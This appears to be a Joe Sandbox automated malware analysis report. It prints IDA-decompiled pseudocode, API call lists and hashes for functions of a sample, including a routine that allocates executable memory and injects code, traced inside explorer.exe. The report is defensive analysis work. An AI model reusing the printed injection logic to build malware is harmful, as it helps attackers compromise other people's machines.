Instruction Fuzzy Hash: BAF090745012069ADB08DFA5C519BAA77B4AF04708F4440AED901D62E2EBB89604CB59

Uniqueness

Uniqueness Score: -1,00%

Function 0040856D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040856D(void* __ebx, void* __edx, void* __edi) {
				char* _v8;
				char _v20;
				char _v36;
				char _v40;
				intOrPtr* _v52;
				char _v56;
				void* __esi;
				void* __ebp;
				intOrPtr* _t31;
				intOrPtr _t46;
				signed int _t47;
				signed int _t48;
				signed int _t50;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t65;
				void* _t67;
				intOrPtr* _t68;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t81;

				_t66 = __edi;
				_t65 = __edx;
				_t55 = __ebx;
				_push(0x10);
				_t31 = E0043057C(__ebx, __edi, _t81);
				if(_t31 == 0) {
					_t71 = _t76;
					_t77 = _t76 - 0x10;
					_push(1);
					_t4 =  &_v8; // 0x405158
					_v8 = "bad allocation";
					E00432030( &_v20, _t4);
					_v20 = 0x44d938;
					E004323B9( &_v20, 0x4674b0);
					asm("int3");
					_push(_t71);
					_t72 = _t77;
					_t78 = _t77 - 0xc;
					E0043200B( &_v40,  &_v20);
					_v40 = 0x44d960;
					E004323B9( &_v40, 0x467504);
					asm("int3");
					_push(_t72);
					_t73 = _t78;
					E0043200B( &_v56,  &_v36);
					_v56 = 0x44d96c;
					E004323B9( &_v56, 0x467540);
					asm("int3");
					_push(_t73);
					_t46 = L00436E83(__edi, _t67, __eflags);
					_t68 = _v52;
					 *_t68 = _t46;
					_t47 = E004374B4(0x100, 2);
					_t61 = _t67;
					 *(_t68 + 4) = _t47;
					__eflags = _t47;
					if(__eflags == 0) {
						_t48 = L00436E07(__edi, _t68, __eflags);
						_t25 = _t68 + 8;
						 *_t25 =  *(_t68 + 8) & 0x00000000;
						__eflags =  *_t25;
						 *(_t68 + 4) = _t48;
					} else {
						L00433F90( *(_t68 + 4), L00436E07(__edi, _t68, __eflags), 0x200);
						 *(_t68 + 8) = 1;
					}
					_t50 =  *(L00436EA9(_t66, _t68, __eflags) + 4);
					 *(_t68 + 0xc) = _t50;
					__eflags = _t50;
					if(_t50 != 0) {
						 *(_t68 + 0xc) = L00436E30(_t55, _t61, _t65, _t66, _t68, _t50);
					}
					return _t68;
				} else {
					_t1 = _t31 + 4; // 0x4
					_t63 = _t1;
					 *_t31 = _t31;
					if(_t63 != 0) {
						 *_t63 = _t31;
					}
					_t64 = _t31 + 8;
					if(_t64 != 0) {
						 *_t64 = _t31;
					}
					 *((short*)(_t31 + 0xc)) = 0x101;
					return _t31;
				}
			}

0x0040856d
0x0040856d
0x0040856d
0x0040856d
0x0040856f
0x00408577
0x00408dde
0x00408de0
0x00408de3
0x00408de5
0x00408dec
0x00408df3
0x00408e01
0x00408e08
0x00408e0d
0x00408e0e
0x00408e0f
0x00408e11
0x00408e21
0x00408e2f
0x00408e36
0x00408e3b
0x00408e3c
0x00408e3d
0x00408e4f
0x00408e5d
0x00408e64
0x00408e69
0x00408e6a
0x00408e6e
0x00408e73
0x00408e7d
0x00408e7f
0x00408e85
0x00408e86
0x00408e89
0x00408e8b
0x00408eac
0x00408eb1
0x00408eb1
0x00408eb1
0x00408eb5
0x00408e8d
0x00408e9b
0x00408ea3
0x00408ea3
0x00408ebd
0x00408ec0
0x00408ec3
0x00408ec5
0x00408ece
0x00408ece
0x00408ed5
0x0040857d
0x0040857d
0x0040857d
0x00408580
0x00408584
0x00408586
0x00408586
0x00408588
0x0040858d
0x0040858f
0x0040858f
0x00408591
0x00408597
0x00408597

APIs

Part of subcall function 0043057C: _malloc.LIBCMT ref: 00430594

std::exception::exception.LIBCMT ref: 00408DF3
__CxxThrowException@8.LIBCMT ref: 00408E08

Strings

XQ@, xrefs: 00408DE5, 00408DE8

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: XQ@
API String ID: 4063778783-1217563551
Opcode ID: 11b8cc6ee27075f0e948928addcc8ee1741ee26cdd6aec11d43a9ba973de4e83
Instruction ID: 64a5ce1ea8818d9cf51680490bcf17e56e49cf07de2fe3ef0ad40d4ba94f1d7b
Opcode Fuzzy Hash: 11b8cc6ee27075f0e948928addcc8ee1741ee26cdd6aec11d43a9ba973de4e83
Instruction Fuzzy Hash: 91F0B474501209AEDB08DFA5C915BEF77B4AF08704F44446ED541E72A2EFB89504CB59

Uniqueness

Uniqueness Score: -1,00%

Function 004085C3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E004085C3(void* __ebx, void* __edx, void* __edi) {
				char* _v8;
				char _v20;
				char _v36;
				char _v40;
				intOrPtr* _v52;
				char _v56;
				void* __esi;
				void* __ebp;
				intOrPtr* _t31;
				intOrPtr _t46;
				signed int _t47;
				signed int _t48;
				signed int _t50;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t65;
				void* _t67;
				intOrPtr* _t68;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t81;

				_t66 = __edi;
				_t65 = __edx;
				_t55 = __ebx;
				_push(0x18);
				_t31 = E0043057C(__ebx, __edi, _t81);
				if(_t31 == 0) {
					_t71 = _t76;
					_t77 = _t76 - 0x10;
					_push(1);
					_t4 =  &_v8; // 0x405158
					_v8 = "bad allocation";
					E00432030( &_v20, _t4);
					_v20 = 0x44d938;
					E004323B9( &_v20, 0x4674b0);
					asm("int3");
					_push(_t71);
					_t72 = _t77;
					_t78 = _t77 - 0xc;
					E0043200B( &_v40,  &_v20);
					_v40 = 0x44d960;
					E004323B9( &_v40, 0x467504);
					asm("int3");
					_push(_t72);
					_t73 = _t78;
					E0043200B( &_v56,  &_v36);
					_v56 = 0x44d96c;
					E004323B9( &_v56, 0x467540);
					asm("int3");
					_push(_t73);
					_t46 = L00436E83(__edi, _t67, __eflags);
					_t68 = _v52;
					 *_t68 = _t46;
					_t47 = E004374B4(0x100, 2);
					_t61 = _t67;
					 *(_t68 + 4) = _t47;
					__eflags = _t47;
					if(__eflags == 0) {
						_t48 = L00436E07(__edi, _t68, __eflags);
						_t25 = _t68 + 8;
						 *_t25 =  *(_t68 + 8) & 0x00000000;
						__eflags =  *_t25;
						 *(_t68 + 4) = _t48;
					} else {
						L00433F90( *(_t68 + 4), L00436E07(__edi, _t68, __eflags), 0x200);
						 *(_t68 + 8) = 1;
					}
					_t50 =  *(L00436EA9(_t66, _t68, __eflags) + 4);
					 *(_t68 + 0xc) = _t50;
					__eflags = _t50;
					if(_t50 != 0) {
						 *(_t68 + 0xc) = L00436E30(_t55, _t61, _t65, _t66, _t68, _t50);
					}
					return _t68;
				} else {
					_t1 = _t31 + 4; // 0x4
					_t63 = _t1;
					 *_t31 = _t31;
					if(_t63 != 0) {
						 *_t63 = _t31;
					}
					_t64 = _t31 + 8;
					if(_t64 != 0) {
						 *_t64 = _t31;
					}
					 *((short*)(_t31 + 0xc)) = 0x101;
					return _t31;
				}
			}

0x004085c3
0x004085c3
0x004085c3
0x004085c3
0x004085c5
0x004085cd
0x00408dde
0x00408de0
0x00408de3
0x00408de5
0x00408dec
0x00408df3
0x00408e01
0x00408e08
0x00408e0d
0x00408e0e
0x00408e0f
0x00408e11
0x00408e21
0x00408e2f
0x00408e36
0x00408e3b
0x00408e3c
0x00408e3d
0x00408e4f
0x00408e5d
0x00408e64
0x00408e69
0x00408e6a
0x00408e6e
0x00408e73
0x00408e7d
0x00408e7f
0x00408e85
0x00408e86
0x00408e89
0x00408e8b
0x00408eac
0x00408eb1
0x00408eb1
0x00408eb1
0x00408eb5
0x00408e8d
0x00408e9b
0x00408ea3
0x00408ea3
0x00408ebd
0x00408ec0
0x00408ec3
0x00408ec5
0x00408ece
0x00408ece
0x00408ed5
0x004085d3
0x004085d3
0x004085d3
0x004085d6
0x004085da
0x004085dc
0x004085dc
0x004085de
0x004085e3
0x004085e5
0x004085e5
0x004085e7
0x004085ed
0x004085ed

APIs

Part of subcall function 0043057C: _malloc.LIBCMT ref: 00430594

std::exception::exception.LIBCMT ref: 00408DF3
__CxxThrowException@8.LIBCMT ref: 00408E08

Strings

XQ@, xrefs: 00408DE5, 00408DE8

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: XQ@
API String ID: 4063778783-1217563551
Opcode ID: 4a1e7c698c683a007d9bb83d11d5d73d6b8ec3b528f623c74357ce683b92eae6
Instruction ID: 2d4388ef2e867d83f8e2e0dee9f60678bd4b2a6c29f2c92aa47ff4273591248f
Opcode Fuzzy Hash: 4a1e7c698c683a007d9bb83d11d5d73d6b8ec3b528f623c74357ce683b92eae6
Instruction Fuzzy Hash: 91F0B474501309AEDB08DFA5C915FEF77B4AF08704F44406ED501DB2A2EF789604CB59

Uniqueness

Uniqueness Score: -1,00%

Function 00408598, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00408598(void* __ebx, void* __edx, void* __edi) {
				char* _v8;
				char _v20;
				char _v36;
				char _v40;
				intOrPtr* _v52;
				char _v56;
				void* __esi;
				void* __ebp;
				intOrPtr* _t31;
				intOrPtr _t46;
				signed int _t47;
				signed int _t48;
				signed int _t50;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t65;
				void* _t67;
				intOrPtr* _t68;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t81;

				_t66 = __edi;
				_t65 = __edx;
				_t55 = __ebx;
				_push(0x14);
				_t31 = E0043057C(__ebx, __edi, _t81);
				if(_t31 == 0) {
					_t71 = _t76;
					_t77 = _t76 - 0x10;
					_push(1);
					_t4 =  &_v8; // 0x405158
					_v8 = "bad allocation";
					E00432030( &_v20, _t4);
					_v20 = 0x44d938;
					E004323B9( &_v20, 0x4674b0);
					asm("int3");
					_push(_t71);
					_t72 = _t77;
					_t78 = _t77 - 0xc;
					E0043200B( &_v40,  &_v20);
					_v40 = 0x44d960;
					E004323B9( &_v40, 0x467504);
					asm("int3");
					_push(_t72);
					_t73 = _t78;
					E0043200B( &_v56,  &_v36);
					_v56 = 0x44d96c;
					E004323B9( &_v56, 0x467540);
					asm("int3");
					_push(_t73);
					_t46 = L00436E83(__edi, _t67, __eflags);
					_t68 = _v52;
					 *_t68 = _t46;
					_t47 = E004374B4(0x100, 2);
					_t61 = _t67;
					 *(_t68 + 4) = _t47;
					__eflags = _t47;
					if(__eflags == 0) {
						_t48 = L00436E07(__edi, _t68, __eflags);
						_t25 = _t68 + 8;
						 *_t25 =  *(_t68 + 8) & 0x00000000;
						__eflags =  *_t25;
						 *(_t68 + 4) = _t48;
					} else {
						L00433F90( *(_t68 + 4), L00436E07(__edi, _t68, __eflags), 0x200);
						 *(_t68 + 8) = 1;
					}
					_t50 =  *(L00436EA9(_t66, _t68, __eflags) + 4);
					 *(_t68 + 0xc) = _t50;
					__eflags = _t50;
					if(_t50 != 0) {
						 *(_t68 + 0xc) = L00436E30(_t55, _t61, _t65, _t66, _t68, _t50);
					}
					return _t68;
				} else {
					_t1 = _t31 + 4; // 0x4
					_t63 = _t1;
					 *_t31 = _t31;
					if(_t63 != 0) {
						 *_t63 = _t31;
					}
					_t64 = _t31 + 8;
					if(_t64 != 0) {
						 *_t64 = _t31;
					}
					 *((short*)(_t31 + 0xc)) = 0x101;
					return _t31;
				}
			}

0x00408598
0x00408598
0x00408598
0x00408598
0x0040859a
0x004085a2
0x00408dde
0x00408de0
0x00408de3
0x00408de5
0x00408dec
0x00408df3
0x00408e01
0x00408e08
0x00408e0d
0x00408e0e
0x00408e0f
0x00408e11
0x00408e21
0x00408e2f
0x00408e36
0x00408e3b
0x00408e3c
0x00408e3d
0x00408e4f
0x00408e5d
0x00408e64
0x00408e69
0x00408e6a
0x00408e6e
0x00408e73
0x00408e7d
0x00408e7f
0x00408e85
0x00408e86
0x00408e89
0x00408e8b
0x00408eac
0x00408eb1
0x00408eb1
0x00408eb1
0x00408eb5
0x00408e8d
0x00408e9b
0x00408ea3
0x00408ea3
0x00408ebd
0x00408ec0
0x00408ec3
0x00408ec5
0x00408ece
0x00408ece
0x00408ed5
0x004085a8
0x004085a8
0x004085a8
0x004085ab
0x004085af
0x004085b1
0x004085b1
0x004085b3
0x004085b8
0x004085ba
0x004085ba
0x004085bc
0x004085c2
0x004085c2

APIs

Part of subcall function 0043057C: _malloc.LIBCMT ref: 00430594

std::exception::exception.LIBCMT ref: 00408DF3
__CxxThrowException@8.LIBCMT ref: 00408E08

Strings

XQ@, xrefs: 00408DE5, 00408DE8

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: XQ@
API String ID: 4063778783-1217563551
Opcode ID: e432a379b38da4816ab620cdffdb7b7fcec7892b876687f48655a85952ba7966
Instruction ID: cc86a30cf6b5a6098b984a98947d99600aa1463aec47aadd84afe3c51e49e642
Opcode Fuzzy Hash: e432a379b38da4816ab620cdffdb7b7fcec7892b876687f48655a85952ba7966
Instruction Fuzzy Hash: 35F0B474501205AEDB08DFA5CA15BEB77F4AF04704F44406ED501DB2A2EFB89504CF69

Uniqueness

Uniqueness Score: -1,00%

Function 0041BAF0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 0041BB1B
_fprintf.LIBCMT ref: 0041BB31

Strings

libpng error: %s, xrefs: 0041BB0D

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _fprintf
String ID: libpng error: %s
API String ID: 1654120334-434142347
Opcode ID: 8aaa761784bacc4cada03d1d20e963d3d13aa75aaf2eb5464dfd13fc3cd9d301
Instruction ID: 65bcb0737ef68f20399839676d8df192b25106163828b4c1411097cea78129f7
Opcode Fuzzy Hash: 8aaa761784bacc4cada03d1d20e963d3d13aa75aaf2eb5464dfd13fc3cd9d301
Instruction Fuzzy Hash: DAF082F6980208B7D700FB92DC03A9D33289B44305F10815BFC051BB42E67DBA44869F

Uniqueness

Uniqueness Score: -1,00%

Function 0041BB90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 0041BBA5
_fprintf.LIBCMT ref: 0041BBBB

Part of subcall function 00434A46: __lock_file.LIBCMT ref: 00434A8D
Part of subcall function 00434A46: __stbuf.LIBCMT ref: 00434B12
Part of subcall function 00434A46: __ftbuf.LIBCMT ref: 00434B2E

Strings

libpng warning: %s, xrefs: 0041BB97

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _fprintf$__ftbuf__lock_file__stbuf
String ID: libpng warning: %s
API String ID: 1306851990-1776161082
Opcode ID: dfe18421a1d659a46ba1cc51e227c6f9f1bf8b270b74cad89a9d04123a1623f2
Instruction ID: 340095a420529484a714b677eecc46a5507d93ba3e155ea5c2d4d56a6607879e
Opcode Fuzzy Hash: dfe18421a1d659a46ba1cc51e227c6f9f1bf8b270b74cad89a9d04123a1623f2
Instruction Fuzzy Hash: 93D0C9E7DC020926EA80B2E65C43A5A324C0A58709F245027BC1996B53E9BDF91800AF

Uniqueness

Uniqueness Score: -1,00%

Function 004314EA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E004314EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {

				_t15 = __eflags;
				L00438D62(__ebx, __edx, __edi, __esi, __eflags);
				_t1 =  &_a4; // 0x444630
				_push( *_t1);
				L00438DBF(__ebx, __edx, __edi, __esi);
				E004315B5(0xff);
				asm("int3");
				_push(1);
				_push(1);
				_push(0);
				return E00431651(__ebx, __edi, __esi, _t15);
			}

0x004314ea
0x004314ed
0x004314f2
0x004314f2
0x004314f5
0x00431500
0x00431505
0x00431506
0x00431508
0x0043150a
0x00431514

APIs

__FF_MSGBANNER.LIBCMT ref: 004314ED

Part of subcall function 00438D62: __NMSG_WRITE.LIBCMT ref: 00438D89
Part of subcall function 00438D62: __NMSG_WRITE.LIBCMT ref: 00438D93

__NMSG_WRITE.LIBCMT ref: 004314F5

Part of subcall function 00438DBF: GetModuleFileNameW.KERNEL32(00000000,0046BC9A,00000104,00000000,00000000,00000000), ref: 00438E51
Part of subcall function 00438DBF: ___crtMessageBoxW.LIBCMT ref: 00438EFF

Part of subcall function 004315B5: _doexit.LIBCMT ref: 004315BF

Strings

0FD, xrefs: 004314F2

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: FileMessageModuleName___crt_doexit
String ID: 0FD
API String ID: 288729343-213406088
Opcode ID: f359a80800d90e4fb5c1f6fae58a97c9a55c69f67057fca1432e0f24a4fa02bf
Instruction ID: a527a719d182578e052b5d055f0fa9e888d67d3e3718db8956bd17eaf894f242
Opcode Fuzzy Hash: f359a80800d90e4fb5c1f6fae58a97c9a55c69f67057fca1432e0f24a4fa02bf
Instruction Fuzzy Hash: EBB0922004030D6BE5993BA28C07A68B6084F58708F98A02E7A14085E39E9C6C80109D

Uniqueness

Uniqueness Score: -1,00%

Function 004025DC, Relevance: 5.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E004025DC(void* __ecx, signed int __edx, intOrPtr* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v984;
				intOrPtr _v988;
				signed int _v1112;
				intOrPtr _v1116;
				intOrPtr _v1188;
				void _v1228;
				int _v1232;
				char _v1236;
				char _v1240;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _t41;
				char* _t42;
				long _t50;
				intOrPtr _t51;
				intOrPtr* _t59;
				void* _t61;
				signed int _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;

				_t68 = __esi;
				_t64 = __edx;
				_t61 = __ecx;
				_t59 = _a4;
				_v1236 = 0;
				_v1232 = 0;
				memset( &_v1228, 0, 0x4c8);
				_t66 = E00402505(_t64);
				_t5 = _t68 + 0x218; // 0x218
				_v1188 = 0x100003;
				memcpy(_t5, E0040416C, 0x100);
				_t41 = E00402C3D(_t61,  *_t59);
				_v1260 = _t41;
				if(_t41 != 0) {
					_t42 =  &_v1236;
					asm("cdq");
					_push(_t64);
					_push(_t42);
					_v1252 = _t42;
					_v1248 = _t64;
					asm("cdq");
					_push(_t64);
					_push( *((intOrPtr*)(_t59 + 4)));
					_push(0);
					_push(2);
					_push( *((intOrPtr*)(_t66 + 4)));
					_push( *_t66);
					if(E00404100() >= 0) {
						_t14 = _t68 + 0x18; // 0x18
						asm("cdq");
						if( *((intOrPtr*)(__esi + 0x10)) == _t14 &&  *((intOrPtr*)(__esi + 0x14)) == _t64) {
							asm("adc ecx, ecx");
							 *((intOrPtr*)(__esi + 0x10)) = _v1256 + 0x18;
							 *((intOrPtr*)(__esi + 0x14)) = 0;
						}
						 *_t68 = _v988;
						 *((intOrPtr*)(_t68 + 4)) = _v984;
						if(E00402C11( *_t59, _v1256, _t68, 0x318,  &_v1240) == 0) {
							goto L11;
						} else {
							_t51 = _v1256;
							_push(_v1248);
							_v1112 = _v1112 & 0x00000000;
							_push(_v1252);
							_v1116 = _t51;
							asm("cdq");
							_v988 = _t51 + 0x218;
							_v984 = _t64;
							asm("cdq");
							_push(_t64);
							_push( *((intOrPtr*)(_t59 + 4)));
							_push(0);
							_push(2);
							_push( *((intOrPtr*)(_t66 + 0xc)));
							_push( *((intOrPtr*)(_t66 + 8)));
							if(E00404100() < 0) {
								goto L3;
							} else {
								_t50 = 0;
								goto L10;
							}
						}
					} else {
						L3:
						_t50 = 5;
					}
				} else {
					_t50 = GetLastError();
					L10:
					if(_t50 == 0xffffffff) {
						L11:
						_t50 = GetLastError();
					}
				}
				return _t50;
			}

0x004025dc
0x004025dc
0x004025dc
0x004025e9
0x004025f5
0x004025f9
0x00402602
0x00402614
0x00402616
0x00402622
0x0040262a
0x00402634
0x0040263b
0x0040263f
0x0040264c
0x00402650
0x00402651
0x00402652
0x00402653
0x0040265a
0x0040265e
0x0040265f
0x00402660
0x00402661
0x00402663
0x00402665
0x00402668
0x00402674
0x00402681
0x00402684
0x00402687
0x00402699
0x0040269b
0x0040269e
0x0040269e
0x004026a8
0x004026b1
0x004026cc
0x00000000
0x004026ce
0x004026ce
0x004026d2
0x004026d6
0x004026de
0x004026e2
0x004026ee
0x004026ef
0x004026f9
0x00402700
0x00402701
0x00402702
0x00402703
0x00402705
0x00402707
0x0040270a
0x00402717
0x00000000
0x0040271d
0x0040271d
0x00000000
0x0040271d
0x00402717
0x00402676
0x00402676
0x00402678
0x00402678
0x00402641
0x00402641
0x0040271f
0x00402722
0x00402724
0x00402724
0x00402724
0x00402722
0x0040272f

APIs

memset.NTDLL ref: 00402602

Part of subcall function 00402505: memset.NTDLL ref: 0040252D
Part of subcall function 00402505: RtlGetVersion.NTDLL(?), ref: 00402546
Part of subcall function 00402505: GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 00402555
Part of subcall function 00402505: OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000), ref: 00402563
Part of subcall function 00402505: CloseHandle.KERNEL32(00000000), ref: 004025CE

memcpy.NTDLL ref: 0040262A

Part of subcall function 00402C3D: NtAllocateVirtualMemory.NTDLL(0040277C,00000000,00000000,0040277C,00003000,00000040), ref: 00402C6E
Part of subcall function 00402C3D: RtlNtStatusToDosError.NTDLL(00000000), ref: 00402C75
Part of subcall function 00402C3D: SetLastError.KERNEL32(00000000), ref: 00402C7C

GetLastError.KERNEL32(00000010,00000218,0040416C,00000100,?,00000318,00000008), ref: 00402641
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0040416C,00000100), ref: 00402724

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Error$Last$Processmemset$AllocateCloseCurrentHandleMemoryOpenStatusVersionVirtualmemcpy
String ID:
API String ID: 3823122031-0
Opcode ID: 8861257a6006569c1729e13f96875e9fee6f4373fe5e97a4f468579cf0585ed0
Instruction ID: bc023021e92adae9595babc9c273d4cfaeead05a789fd3ee93df30f8760a42fc
Opcode Fuzzy Hash: 8861257a6006569c1729e13f96875e9fee6f4373fe5e97a4f468579cf0585ed0
Instruction Fuzzy Hash: 6841BEB1504300AFD720DF25DD45B9BBBE9AB98314F00893EF999E62D0E774D8148B6A

Uniqueness

Uniqueness Score: -1,00%

Analysis Process: explorer.exe PID: 2752 Parent PID: 588 explorer.exeCOMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	42.9%
Total number of Nodes:	252
Total number of Limit Nodes:	23

Executed Functions

Function 015630D0, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenProcess.NTDLL(?,00000400,?,?), ref: 01563118
NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0156312B
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 01563148

Part of subcall function 01541566: RtlAllocateHeap.NTDLL(00000000,?,015606B7), ref: 01541572

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?,?), ref: 01563165
memcpy.NTDLL(?,00000000,0000001C), ref: 01563172
NtClose.NTDLL(?), ref: 01563184
NtClose.NTDLL(?), ref: 0156318F

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 4b0e7926f5555aee8c5a437d47c8627e3fd95b7924ad9e6e969e72c54bb340a1
Instruction ID: 1258b70bdb6b85c0c001089a089f2873c8e0e1b292f76f8a418394f51b8366e7
Opcode Fuzzy Hash: 4b0e7926f5555aee8c5a437d47c8627e3fd95b7924ad9e6e969e72c54bb340a1
Instruction Fuzzy Hash: BD211575D00209AFEB51DBA9CC859DEBFBDFF88700F104066E610BA120D7719A499BA0

Uniqueness

Uniqueness Score: -1,00%

Function 0156B1C6, Relevance: 9.2, APIs: 6, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(0156BD07,?,?,?,0156BD07,?,0156BD07,?,?,?,?,?), ref: 0156B2C1
memcpy.NTDLL(0156BD1F,?,00000220,00000000,?,?,01541C3F,000000FF,?,00000000,?), ref: 0156B31C
memcpy.NTDLL(0156BABF,?,00000800,0156BD07), ref: 0156B388

Part of subcall function 0156B07A: GetModuleHandleA.KERNEL32(0159A8AE,?,0156BD07,0156B370,0156BD07), ref: 0156B0AD
Part of subcall function 0156B07A: memcpy.NTDLL(?,3!|w,00000018,0159B1D8,0159B1FA,0159B1EF), ref: 0156B118

Part of subcall function 015610E1: memset.NTDLL ref: 01561100

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0156B3CB
RtlNtStatusToDosError.NTDLL(00000000), ref: 0156B3D2
CloseHandle.KERNELBASE(00000000), ref: 0156B3E3

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$Handle$CloseErrorModuleSectionStatusUnmapViewmemset
String ID:
API String ID: 3808786462-0
Opcode ID: 91b5d76dcd5f1184d5f502f98b961635d2d6fa254bca3505851f0e5a433616db
Instruction ID: f79c20108c49a506d5509ffd6bbd32876c97ff6e4a5e4e3e60c07f23b93c14e7
Opcode Fuzzy Hash: 91b5d76dcd5f1184d5f502f98b961635d2d6fa254bca3505851f0e5a433616db
Instruction Fuzzy Hash: 98615B716043529FCB11CF18C844A5EBBE9BF98308F040A6DF999DB255D730EA59CBC2

Uniqueness

Uniqueness Score: -1,00%

Function 01560FBC, Relevance: 7.6, APIs: 5, Instructions: 93
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 01560FDE
GetLastError.KERNEL32(?,00000318,00000008), ref: 015610D1

